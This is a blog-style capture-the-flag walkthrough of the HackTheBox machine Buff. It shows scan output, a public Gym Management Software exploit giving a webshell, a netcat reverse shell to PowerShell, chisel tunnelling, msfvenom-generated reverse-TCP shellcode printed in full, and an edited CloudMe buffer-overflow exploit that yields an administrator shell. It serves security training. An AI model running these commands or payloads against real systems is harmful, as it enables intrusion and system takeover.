HackTheBox: Buff

My first step was to run Nmap against the host to identify running services:

# Nmap 7.91 scan initiated Fri Nov 20 14:21:08 2020 as: nmap -sV -O -p- -sC -oN scan 10.10.10.198
Nmap scan report for 10.10.10.198
Host is up (0.024s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE    VERSION
7680/tcp open  pando-pub?
8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows XP|7 (89%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows XP SP3 (89%), Microsoft Windows XP SP2 (86%), Microsoft Windows 7 (85%)
No exact OS matches for host (test conditions non-ideal).

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Nov 20 14:24:09 2020 -- 1 IP address (1 host up) scanned in 181.05 seconds

From the output you can see there are 2 services running, HTTP on port 8080, and Pando-pub on 7680. I decided to start with HTTP. Browsing to the website you can see a page relating to fitness. After browsing the website and looking at the contact page, i found its created by Gym Management Software 1.0. I did a Google search for exploits involving this software and discovered THIS one. I downloaded the exploit and ran it as advertised, it successfully generated a shell on the Buff machine.

┌──(root💀kali)-[/home/kali/Documents/buff]
└─# python 48506.py http://10.10.10.198:8080/                                                                                                                                                                                          1 ⨯
            /\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
            \/

[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> dir
�PNG
▒
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\xampp\htdocs\gym\upload

24/11/2020  18:25    <DIR>          .
24/11/2020  18:25    <DIR>          ..
24/11/2020  18:25                53 kamehameha.php
               1 File(s)             53 bytes
               2 Dir(s)   7,133,868,032 bytes free

From here I was able to capture the user flag from the Shaun account.

C:\xampp\htdocs\gym\upload> type c:\users\shaun\Desktop\user.txt
�PNG
▒
[REDACTED]

The next step was to escalate privileges. I first created a persistent reverse shell to make it easier to enumerate the machine.  I copied netcat to the buff machine using Impackets SMB server.

┌──(root💀kali)-[/var/www]
└─# python3 smbserver.py testshare -smb2support /var/www/
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

I copied nc.exe into /var/www then copied that to the buff machine:

C:\xampp\htdocs\gym\upload> copy \\10.10.14.19\testshare\nc.exe
�PNG
▒
        1 file(s) copied.

I then started a listener on Kali on port 2600:

┌──(root💀kali)-[/home/kali]
└─# nc -nvlp 2600

Then ran Netcat on buff sending a PowerShell session to 2700 on Kali:

C:\xampp\htdocs\gym\upload> nc.exe 10.10.14.19 2600 -e powershell
┌──(root💀kali)-[/home/kali]
└─# nc -nvlp 2600                                                                                                                                                                                                                      1 ⨯
listening on [any] 2600 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.198] 49708
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\xampp\htdocs\gym\upload>

As you can see i the output, the reverse shell was generated successfully. I next browsed around the machine looking for anything that could provide privilege escalation. I discovered that in the Downloads folder there is a file called CloudMe_1122.exe.

PS C:\Users\shaun\Downloads> dir
dir


    Directory: C:\Users\shaun\Downloads


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----       16/06/2020     16:26       17830824 CloudMe_1112.exe                                                      


PS C:\Users\shaun\Downloads> 

After some googling I discovered this program runs on port 8888. I ran netstat and found there was in fact a service listening locally on port 8888, and so it was very likely this was the CloudMe software running.

PS C:\Users\shaun\Downloads> netstat -ano
netstat -ano

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       952
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5040           0.0.0.0:0              LISTENING       5708
  TCP    0.0.0.0:7680           0.0.0.0:0              LISTENING       6508
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       6544
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       524
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       1052
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1580
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       2236
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       668
  TCP    0.0.0.0:49669          0.0.0.0:0              LISTENING       684
  TCP    10.10.10.198:139       0.0.0.0:0              LISTENING       4
  TCP    10.10.10.198:8080      10.10.14.19:54178      CLOSE_WAIT      6544
  TCP    10.10.10.198:8080      10.10.14.19:54182      CLOSE_WAIT      6544
  TCP    10.10.10.198:8080      10.10.14.19:54220      ESTABLISHED     6544
  TCP    10.10.10.198:49677     10.10.14.19:2600       CLOSE_WAIT      7792
  TCP    10.10.10.198:49686     10.10.14.19:2700       ESTABLISHED     3576
  TCP    10.10.10.198:49688     10.10.14.19:2600       CLOSE_WAIT      7368
  TCP    10.10.10.198:49690     10.10.14.19:2700       ESTABLISHED     7820
  TCP    10.10.10.198:49703     10.10.14.19:2525       ESTABLISHED     3140
  TCP    10.10.10.198:49708     10.10.14.19:2600       ESTABLISHED     7796
  TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING       6348
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       5860
  TCP    [::]:135               [::]:0                 LISTENING       952
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:7680              [::]:0                 LISTENING       6508
  TCP    [::]:8080              [::]:0                 LISTENING       6544
  TCP    [::]:49664             [::]:0                 LISTENING       524
  TCP    [::]:49665             [::]:0                 LISTENING       1052
  TCP    [::]:49666             [::]:0                 LISTENING       1580
  TCP    [::]:49667             [::]:0                 LISTENING       2236
  TCP    [::]:49668             [::]:0                 LISTENING       668
  TCP    [::]:49669             [::]:0                 LISTENING       684
  UDP    0.0.0.0:123            *:*                                    3964
  UDP    0.0.0.0:5050           *:*                                    5708
  UDP    0.0.0.0:5353           *:*                                    1124
  UDP    0.0.0.0:5355           *:*                                    1124
  UDP    0.0.0.0:51203          *:*                                    1124
  UDP    0.0.0.0:59591          *:*                                    1124
  UDP    0.0.0.0:62872          *:*                                    1124
  UDP    0.0.0.0:65365          *:*                                    1124
  UDP    10.10.10.198:137       *:*                                    4
  UDP    10.10.10.198:138       *:*                                    4
  UDP    10.10.10.198:1900      *:*                                    6064
  UDP    10.10.10.198:63108     *:*                                    6064
  UDP    127.0.0.1:1900         *:*                                    6064
  UDP    127.0.0.1:63109        *:*                                    6064
  UDP    127.0.0.1:63756        *:*                                    3060
  UDP    [::]:123               *:*                                    3964
  UDP    [::]:5353              *:*                                    1124
  UDP    [::]:5355              *:*                                    1124
  UDP    [::]:51203             *:*                                    1124
  UDP    [::]:59591             *:*                                    1124
  UDP    [::]:62872             *:*                                    1124
  UDP    [::]:65365             *:*                                    1124
  UDP    [::1]:1900             *:*                                    6064
  UDP    [::1]:63107            *:*                                    6064
  UDP    [fe80::6533:1880:c4d1:fb8f%10]:1900  *:*                                    6064
  UDP    [fe80::6533:1880:c4d1:fb8f%10]:63106  *:*                                    6064
PS C:\Users\shaun\Downloads> 

I did some searching for an exploit for CloudMe and discovered THIS one. The only difficulty is this is a remote buffer overflow exploit and the CloudMe service is only listening locally, so can’t be accessed with the Kali machine. The way to circumvent this is by reverse tunnelling the service on 8888 to Kali so it can be accessed remotely. I did this using a tool called CHISEL.

I began by starting the chisel server on the Kali machine. This is what the client on the Buff machine will connect to to create the tunnel.

┌──(root💀kali)-[/home/kali/Documents/buff]
└─# chisel server -p 2700 --host 10.10.14.19 --reverse

I next copied chisel to the Buff machine using the same method previously for netcat. The Chisel client was then run forwarding port 8888 to kali so it can be accessible on port 2850.

PS C:\xampp\htdocs\gym\upload> ./chisel.exe client 10.10.14.19:2700 R:2850:127.0.0.1:8888
./chisel.exe client 10.10.14.19:2700 R:2850:127.0.0.1:8888
2020/12/04 18:32:02 client: Connecting to ws://10.10.14.19:2700
2020/12/04 18:32:02 client: Connected (Latency 22.261ms)

This means that port 8888 can be accessed from the Kali machine on 127.0.0.1:2850. So now i had to run the exploit against that port.

The exploit requires some minor editing before it can be run. The payload needed to be altered to a reverse shell is spawned rather thatn calc.exe. The port also had to be modified so it interacts with port 2850 and not 8888.

I generated the payload using the following command:

┌──(root💀kali)-[/usr/share/windows-resources/binaries]
└─# msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=2525 -b '\x00\x0A\x0D' -f python                                                                                                                              1 ⨯
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of python file: 1712 bytes
buf =  b""
buf += b"\xba\x4b\xab\xb3\x24\xda\xcd\xd9\x74\x24\xf4\x5f\x29"
buf += b"\xc9\xb1\x52\x83\xc7\x04\x31\x57\x0e\x03\x1c\xa5\x51"
buf += b"\xd1\x5e\x51\x17\x1a\x9e\xa2\x78\x92\x7b\x93\xb8\xc0"
buf += b"\x08\x84\x08\x82\x5c\x29\xe2\xc6\x74\xba\x86\xce\x7b"
buf += b"\x0b\x2c\x29\xb2\x8c\x1d\x09\xd5\x0e\x5c\x5e\x35\x2e"
buf += b"\xaf\x93\x34\x77\xd2\x5e\x64\x20\x98\xcd\x98\x45\xd4"
buf += b"\xcd\x13\x15\xf8\x55\xc0\xee\xfb\x74\x57\x64\xa2\x56"
buf += b"\x56\xa9\xde\xde\x40\xae\xdb\xa9\xfb\x04\x97\x2b\x2d"
buf += b"\x55\x58\x87\x10\x59\xab\xd9\x55\x5e\x54\xac\xaf\x9c"
buf += b"\xe9\xb7\x74\xde\x35\x3d\x6e\x78\xbd\xe5\x4a\x78\x12"
buf += b"\x73\x19\x76\xdf\xf7\x45\x9b\xde\xd4\xfe\xa7\x6b\xdb"
buf += b"\xd0\x21\x2f\xf8\xf4\x6a\xeb\x61\xad\xd6\x5a\x9d\xad"
buf += b"\xb8\x03\x3b\xa6\x55\x57\x36\xe5\x31\x94\x7b\x15\xc2"
buf += b"\xb2\x0c\x66\xf0\x1d\xa7\xe0\xb8\xd6\x61\xf7\xbf\xcc"
buf += b"\xd6\x67\x3e\xef\x26\xae\x85\xbb\x76\xd8\x2c\xc4\x1c"
buf += b"\x18\xd0\x11\xb2\x48\x7e\xca\x73\x38\x3e\xba\x1b\x52"
buf += b"\xb1\xe5\x3c\x5d\x1b\x8e\xd7\xa4\xcc\xbb\x2d\xa8\x1f"
buf += b"\xd4\x33\xb4\x16\xf9\xbd\x52\x42\x11\xe8\xcd\xfb\x88"
buf += b"\xb1\x85\x9a\x55\x6c\xe0\x9d\xde\x83\x15\x53\x17\xe9"
buf += b"\x05\x04\xd7\xa4\x77\x83\xe8\x12\x1f\x4f\x7a\xf9\xdf"
buf += b"\x06\x67\x56\x88\x4f\x59\xaf\x5c\x62\xc0\x19\x42\x7f"
buf += b"\x94\x62\xc6\xa4\x65\x6c\xc7\x29\xd1\x4a\xd7\xf7\xda"
buf += b"\xd6\x83\xa7\x8c\x80\x7d\x0e\x67\x63\xd7\xd8\xd4\x2d"
buf += b"\xbf\x9d\x16\xee\xb9\xa1\x72\x98\x25\x13\x2b\xdd\x5a"
buf += b"\x9c\xbb\xe9\x23\xc0\x5b\x15\xfe\x40\x6b\x5c\xa2\xe1"
buf += b"\xe4\x39\x37\xb0\x68\xba\xe2\xf7\x94\x39\x06\x88\x62"
buf += b"\x21\x63\x8d\x2f\xe5\x98\xff\x20\x80\x9e\xac\x41\x81"

The payload was then added to the exploit. I also modified the the port from 8888 to 2850:

try:
        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target,2850))
        s.send(buf)
except Exception as e:
        print(sys.exc_value)

Once these changes had been made, i created a netcat listener to listen on port 2525 as specified in the payload I created:

┌──(kali㉿kali)-[~]
└─$ nc -nvlp 2525
listening on [any] 2525 ...

The exploit was then run:

┌──(root💀kali)-[/home/kali/Documents/buff]
└─# python 48389.py  
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 2525
listening on [any] 2525 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.198] 49703
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
buff\administrator

C:\Windows\system32>cd /
cd /

C:\>cd users
cd users

C:\Users>dir
dir
  Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\Users

16/06/2020  19:52    <DIR>          .
16/06/2020  19:52    <DIR>          ..
20/07/2020  11:08    <DIR>          Administrator
16/06/2020  14:08    <DIR>          Public
16/06/2020  14:11    <DIR>          shaun
               0 File(s)              0 bytes
               5 Dir(s)   7,280,562,176 bytes free

C:\Users>Administrator
cd Administrator

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>ir
dir
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\Users\Administrator\Desktop

18/07/2020  16:36    <DIR>          .
18/07/2020  16:36    <DIR>          ..
16/06/2020  15:41             1,417 Microsoft Edge.lnk
04/12/2020  18:23                34 root.txt
               2 File(s)          1,451 bytes
               2 Dir(s)   7,280,562,176 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
[REDACTED]

As you can see from the output, the exploit worked successfully, the reverse shell was captured by the netcat listener and I was able to capture the root flag.

Leave a Reply

Your email address will not be published. Required fields are marked *